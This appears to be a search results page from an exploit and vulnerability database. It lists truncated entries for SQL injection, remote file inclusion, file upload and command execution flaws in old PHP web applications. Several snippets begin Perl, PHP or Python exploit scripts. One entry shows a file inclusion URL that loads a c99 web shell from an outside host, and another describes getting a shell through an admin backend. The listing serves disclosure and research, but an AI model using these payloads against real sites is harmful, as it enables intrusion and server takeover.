649 matches found
PHPDirector <= 0.21 (videos.php id) Remote SQL Injection Vulnerability
No description provided by source. PHPDirector = 0.21 SQL injection/Upload SHELL Remote Vulnerabilities WEB APP: PHPDirector 0.21 SITE: http://www.phpdirector.co.uk/site/ DORK: Powered by PHP Director AUTHOR: Kw3rLn tehlostbyteatYaHoOd0tCom Romanian Security Team Ethical Hacking -...
Golabi CMS <= 1.0.1 Session Poisoning Vulnerability
No description provided by source.
Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln
No description provided by source. Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit : /install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt? Examp...
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; ...
phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit
No description provided by source. !/usr/bin/perl phpindexpage 1.0 & 1.0.1 config.phpRemote File Include Vulnerability Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Pantagon Class: Remote File Include Vulnerability exemplary Exp: http://www.site.com/config.php?envincpath=...
DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit
No description provided by source. ?php / DaLogin 2.2 FCKeditor Remote Arbitrary File Upload Exploit...
FreePBX 2.11.0 - Remote Command Execution
No description provided by source. !/usr/bin/perl use strict; use warnings; use IO::Socket::INET; Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution Google Dork: n/a Date: 2/25/14 Exploit Author: @0x00string Vendor Homepage: http://www.freepbx.org/ Software Link:...
Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
No description provided by source. Vendor: Plume CMS http://plume-cms.net Vuln: Remote File Include Discovered: beford xbefordx gmail com Vulnerable File/Code ./plume-1.0.3/manager/frontinc/prepend.php code includeonce $PXconfig'managerpath'.'/conf/config.php'; /code...
SmodCMS 4.07 (fckeditor) - Remote Arbitrary File Upload Exploit
No description provided by source. ?php / SmodCMS v.4.07 fckeditor Remote Arbitrary File Upload Exploit...
DM Filemanager 3.9.11 Arbitrary File Upload Vulnerability
No description provided by source. ?php / DM Filemanager fckeditor Remote Arbitrary File Upload Exploit Vendor: www.dutchmonkey.com Download :...
Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit
No description provided by source. ?php Podcast Generator = 1.2 unauthorized CMS Re-Installation Remote Exploit by staker mail: stakerathotmaildotit url: http://podcastgen.sourceforge.net it works with registerglobals=o...
LokiCMS <= 0.3.3 - Remote Command Execution Exploit
No description provided by source. Author: GiReX mySite: girex.altervista.org Date: 8/04/08 CMS: LokiCMS = 0.3.3 Site: lokicms.com Bug: PHP Code Injection Exploit: Remote Command Execution Vuln Code: admin.php if $GET'default' != '' // User want's to set the default page writeconfig$cpassword,...
RedBLoG 0.5 admin/config.php root_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
No description provided by source. Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP:...
phpBB <= 2.0.10 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; phpBB = 2.0.10 remote commands exec exploit based on...
Modernbill <= 1.6 (config.php) Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63791' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-09' createDate = '2015-12-24...
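HDWiki 5.1: Getting a Shell via the Admin Backend
Brief description: After logging in to the admin backend, inserted code can be executed. Details: Log in to the admin backend; under Global, in the Site URL field, write PHP code. The code is written to the config.php file. Access the config.php file. Proof of vulnerability: As above...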
C2FO: c2fo.com is releasing sensitive Information about Database Configuration.
Hello C2FO Security Team, Vulnerability Details: Disclosure of Database Username and Password of c2fo.com Description: Your configuration file of your website is available to download from your website c2fo.com. When I thought to pentest your site, I landed on https://c2fo.com. But instead of...
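Horizon QCMS "/lib/functions/d-load.php" Directory Traversal Vulnerability
CVE ID: CVE-2013-7138 Horizon QCMS is the open-source Horizon quick content management system, which supports PHP and MySQL. The vulnerability exists because the "start" HTTP GET parameter passed to the "/lib/functions/d-load.php" script is not sufficiently filtered before it is used in the "fopen" method; a remote attacker can read arbitrary file contents on the target system with the privileges of the web server. 0 Horizon QCMS=4.0 Vendor patch: Horizon ----- Horizon version 4.0 has fixed this vulnerability; users are advised to download and use it:...
DedeCMS 5.7 config.php Cross-Site Scripting Vulnerability
dedecms 5.7 config.php cross-site scripting vulnerability \include\dialog\config.php $cuserLogin = new userLogin; if$cuserLogin-getUserID 提示:需输入后台管理目录才能登录请输入后台管理目录名:", "javascript:;"; exit; $gurl = "../../$adminDirHand/login.php?gotopage=".urlencode$dedeNowurl; echo "location='$gurl';"; exit; For the user-submitted $adminDirHand...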